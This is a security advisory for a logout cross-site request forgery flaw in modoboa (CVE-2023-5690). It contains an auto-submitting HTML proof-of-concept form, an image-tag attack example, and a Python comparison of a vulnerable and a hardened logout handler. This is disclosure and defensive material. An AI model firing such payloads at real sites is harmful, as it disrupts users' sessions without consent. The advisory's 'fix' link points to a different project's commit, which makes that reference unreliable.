Headline
CVE-2023-5690: Cross-Site Request Forgery Vulnerability in Logout Functionality in modoboa
Cross-Site Request Forgery (CSRF) in GitHub repository modoboa/modoboa prior to 2.2.2.
Description
Logout CSRF is a security vulnerability where an attacker forces a user to unknowingly log out of their session by tricking them into triggering a logout request through a malicious website or link.
The logout endpoint does not require a CSRF token and accepts a plain GET, so the request can be triggered cross-site; it is recommended to change the endpoint to accept only HTTP POST, with a CSRF token, to send the logout request:
GET /accounts/logout/
Proof of Concept
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.modoboa.org/accounts/logout/">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
The fix can be found in
https://github.com/WeblateOrg/weblate/commit/bfa82b569114608d3fc16d2f957ee2ab696cd581
Impact
This vulnerability is capable of causing a user to inadvertently log out.
For example, an image tag pointing at the logout URL: <img src="<your logout link>">
One way the GET logout can be abused is if someone (maybe a competitor :)) places such an image tag anywhere on the internet; any logged-in user of your site who stumbles upon that page will be logged out without knowing it.
Although this won’t harm the user’s account, it can be a big annoyance and is a valid CSRF.
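To show what the recommended change actually buys, here is an added, framework-free Python model of the logout endpoint; it is not modoboa's code. The first handler mirrors the reported behaviour (any GET to /accounts/logout/ ends the session, which is exactly what the PoC form or an image tag sends), the second requires POST plus a session-bound token; the Request class, the "csrftoken" session key and the sample session are assumptions made for the demo.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Minimal stand-in for a web request, assumed for this demo (not a real framework type).
@dataclass
class Request:
    method: str
    path: str
    session: dict
    form: dict = field(default_factory=dict)

LOGOUT_PATH = "/accounts/logout/"

def logout_vulnerable(req: Request) -> int:
    """Mirrors the reported behaviour: any request to the logout path, including a
    plain GET from a cross-site form or <img src=...>, ends the session. Django's
    CsrfViewMiddleware does not check GET, so no token is ever demanded."""
    if req.path != LOGOUT_PATH:
        return 404
    req.session.clear()
    return 302

def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to the session; the app renders it into its logout form."""
    token = secrets.token_hex(32)
    session["csrftoken"] = token  # session key name is an assumption for this demo
    return token

def logout_hardened(req: Request) -> int:
    """Recommended shape: POST only, and the submitted token must match the session's."""
    if req.path != LOGOUT_PATH:
        return 404
    if req.method != "POST":
        return 405  # GET/HEAD never log anyone out
    expected = req.session.get("csrftoken")
    supplied = req.form.get("csrfmiddlewaretoken", "")  # Django's form field name
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403  # a cross-site page has no way to learn the session's token
    req.session.clear()
    return 302

def cross_site_logout(handler) -> tuple:
    """Replay what the PoC page does: a GET with no token against a logged-in session.
    Returns (status, still_logged_in)."""
    session = {"user": "alice"}  # constructed sample session
    issue_csrf_token(session)
    status = handler(Request("GET", LOGOUT_PATH, session))
    return status, "user" in session
```

Running cross_site_logout against both handlers shows the vulnerable one returning 302 with the session gone, and the hardened one returning 405 with the user still logged in.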